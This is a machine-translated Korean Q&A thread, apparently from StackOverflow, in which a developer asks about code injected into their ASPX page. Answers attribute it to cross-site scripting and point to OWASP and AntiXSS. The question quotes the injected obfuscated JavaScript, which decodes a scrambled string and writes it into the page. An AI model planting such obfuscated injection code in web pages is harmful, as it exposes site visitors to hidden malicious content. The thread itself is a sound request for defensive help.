2. 질의 응답
  3. 코드가 삽입 됨

코드가 삽입 됨

2012-03-27 3 views
3

오늘 내 사이트가 다운 된 것을 발견했습니다 ... 오류를 끄고 오류를 추적했습니다. 내 aspx 페이지 하단에 몇 가지 코드가 추가 된 것으로 밝혀졌습니다. (아래 코드를 찾으십시오). 분명히 코드가 내 aspx 페이지 didnot 허용하지 않는 일부 HTML 태그를했다 .. 오류가 발생했습니다.코드가 삽입 됨

나는 누군가가 내 aspx 페이지에 코드를 삽입 할 수있는 허점을 가질 수 있는지 확인해야합니다 scenerios 알아?

<html> 
<body> 
<script> 
var a=''; 
var b='%2/tafod%h2b233 Cstx-ri2%%32d%i e%/i.nci5g%e%%% 30hisen%h2%%r0/ irt-cis232D0e2f %22mcmimt2t2o2CEr%%nrae2%h2r%%a mDAlmu.w2i5mDEe fcpahch%D0%fr2r a33aond02e2a33m '; 
var c='5314869720'; 
for(var i=0;i<16;i++) for(var j=0;j<10;j++) a+=b.charAt((parseInt(c.charAt(j))*16)+i); 
document.writeln(unescape(a)); 
</script> 
</body>  
</html>

출처

2012-03-27 pessi

+0

입니다 읽기 시작 할 수있다? 귀하의 방문자가 귀하의 웹 사이트에 텍스트를 삽입하도록 허용합니까? (shoutbox, forum ...) – walther

+1

[AntiXSS] (http://wpl.codeplex.com/) –

+0

@Tim Schmelter - 우리가 사용하는 것입니다. 나는 그것을 좋아한다. – David

답변

1

내게는 cross-site scripting (XSS)입니다. 그것은 SQL Injection 직후 # 2에서 가장 흔한 공격입니다.

불쾌감은 당신의 경험/배경을 모르지만, XSS를 인식하지 못하고 웹 개발자가되어 있다면 강력하게 읽으라고 제안합니다. OWASP는 훌륭한 리소스입니다.

XSS는 귀하의 웹 사이트를 방문하는 사람들에게 영향을 미칠뿐만 아니라 CSRF (Cross-Site Request Forgery) 덕분에 XSS는 시청자가 로그인 한 attack on other websites에 영향을받을 수 있으므로 귀하와 귀하의 웹 사이트뿐만 아니라 다른 사이트에도 영향을 미칩니다.

출처

2012-03-27 21:33:42 David

+0

고맙습니다. 지금 읽기! 그리고 나는 빠른 학습자입니다. – pessi

+0

그런데 ... 한 페이지에 코드를 삽입하면 ...이 특정 페이지에 문제가 있다고 생각할 수 있습니까? – pessi

+1

이 특정 페이지에는 문제가 있다고 가정 할 수 있지만이 특정 페이지에만 문제가있는 것은 아닙니다. 짧은 버전의 모든 정보는 항상 신뢰할 수없는 모든 데이터를 페이지에서 빠져 나가기 전에 제거하는 것입니다. @TimSchmelter는 .NET을 사용하고 있으므로 웹 보호 라이브러리를 사용하고 NiK의 대답에 대한 링크도 읽으므로 @TimSchmelter가 제안했듯이 데이터베이스, 텍스트 상자 등에서 오는 모든 텍스트를 의미합니다. 행운을 빕니다! – David

1

예 다윗이 맞다 ... 당신이 도움이 Prevent Cross-Site Scripting

희망 ...이 웹 사이트의 어떤 종류의

출처

2012-03-27 21:38:54 NiK

+0

좋은 기사. 게시 해 주셔서 감사합니다! – David

관련 문제

 관련 문제